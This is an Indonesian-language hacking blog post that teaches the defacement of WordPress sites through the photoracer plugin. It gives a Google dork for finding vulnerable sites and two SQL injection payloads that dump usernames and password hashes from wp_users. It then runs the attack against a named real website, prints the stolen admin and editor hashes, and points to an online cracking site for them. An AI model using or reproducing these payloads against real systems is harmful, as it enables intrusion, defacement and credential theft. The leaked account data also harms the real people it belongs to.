deface exploit wordpress

BUMIAYU,ALJINET-Pagi semua,kali ini aljinet mau berbagi dengan sahabat bumiayu,tentang dan cara deface website,atau mencari kelemahan dari wordpress.
Dengan metode menggunakan exploit untuk mencari target yang mengalamai kelemahan sistem(vuln).coba kita mulai testing :D
yang harus di gunakan adalah dork,sahabat bumiayu sudah tak anggap sudah tau dork,berikut dork-nya

Dork :inurl:"wp-content/plugins/photoracer/viewimg.php?id=" .
(copas ke url google,nah dapat tuh banyak vuln wordpressnya) :D

Untuk mencari password dan adminya,kalian gunakan exploit,nah ini yang saya bahasa exploit
berikut exploitnya : ada 2 cara sebagai berikut

exploit :
1. +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
2. +union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9+from+wp_users

Silakan sahabat bumiayu pilih yang mana,aljinet hanya share :D gunakan dengan bijak.Itu kalian bisa pilih nomor.1 dan 2 ,tapi jangan di semuanya ya ckckck
kalo sudah di exploitkan,nah lo ketemu tuh admin sama passnya :D
 

contoh/demo
http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1 (vuln)
injek aja dengan menggunakan exploit yang aljinet sudah share kan,misala pake yang nomor 1.
jadi begini,jadinya

http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat%280x3a,user_login,0x3a,user_pass%29,6,7,8+from+wp_users--

keluar tuh,ada adminya
:admin:$P$B5OZifKi4NHils1VNfO8CspmAwZqvP0,:guess:$P$B30pt3MIHR6y8ZeEPeS5kPImOXAeyz/,:emilia_editor:$P$B4l5wGl73xike0iL8rdpU3EQwsCIDG.,:jeni_chiriac:$P$BxJJ3YUfSZNyP9zpSkMLJal40BBVHY/

untuk mencracknya bisa secara online
http://www.md5decrypt.org/ (dimd5 decryp online )

lumayanlah kalo ada $$ bagi-bagi ya hihihihi

mangap turtorialnya berantakan,sementara segini saja ya sobat bumiayu hacker,aljinet.untuk selanjutnya nanti akan share toolsnya :D

keep silit
BY.aljinet bumiayu

Posted in: deface